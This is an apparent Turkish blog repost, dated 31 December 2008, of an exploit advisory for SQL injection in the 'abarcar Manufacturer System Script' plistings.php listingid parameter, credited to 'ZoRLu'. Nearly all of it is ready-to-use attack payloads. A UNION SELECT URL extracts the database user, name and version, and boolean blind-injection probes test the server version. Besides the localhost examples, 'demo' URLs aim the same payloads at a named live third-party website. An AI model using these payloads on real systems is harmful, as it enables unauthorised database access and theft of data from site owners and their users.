abarcar Manufacturer System Script plistings.php (listingid) Blind/Remote sql inj
link: http://packetstormsecurity.org/0812-exploits/abarcarmanu-sql.txt
link: http://www.experl.com/abarcar-manufacturer-system-script-plistingsphp-listingid-blind-remote-sql-inj-353/
Discovered By: ZoRLu
Exploit: ( remote )
http://localhost/script_path/plistings.php?prlid=ZoRLu&listingid=[SQL]
[SQL]=
-99999999999999+union+all+select+0,1,2,3,4,unhex(hex(concat(user(),0x3a,database(),0x3a,version()))),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,unhex(hex(concat(user(),0x3a,database(),0x3a,version()))),65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103--
exploit for demo:
http://www.iqffreezer.com/plistings.php?prlid=ZoRLu&listingid=-99999999999999+union+all+select+0,1,2,3,4,unhex(hex(concat(user(),0x3a,database(),0x3a,version()))),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,unhex(hex(concat(user(),0x3a,database(),0x3a,version()))),65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103--
Exploit: ( blind )
http://localhost/script_path/plistings.php?prlid=ZoRLu&listingid=40+and+substring(@@version,1,1)=4 ( true )
http://localhost/script_path/plistings.php?prlid=ZoRLu&listingid=40+and+substring(@@version,1,1)=3 ( false )
exploit for demo:
http://www.iqffreezer.com/plistings.php?prlid=ZoRLu&listingid=40+and+substring(@@version,1,1)=4 ( true )
http://www.iqffreezer.com/plistings.php?prlid=ZoRLu&listingid=40+and+substring(@@version,1,1)=3 ( false )
31 Aralık 2008 Çarşamba
abarcar Manufacturer System Script plistings.php (listingid) Blind/Remote sql inj
Kaydol:
Kayıt Yorumları (Atom)
0 yorum:
Yorum Gönder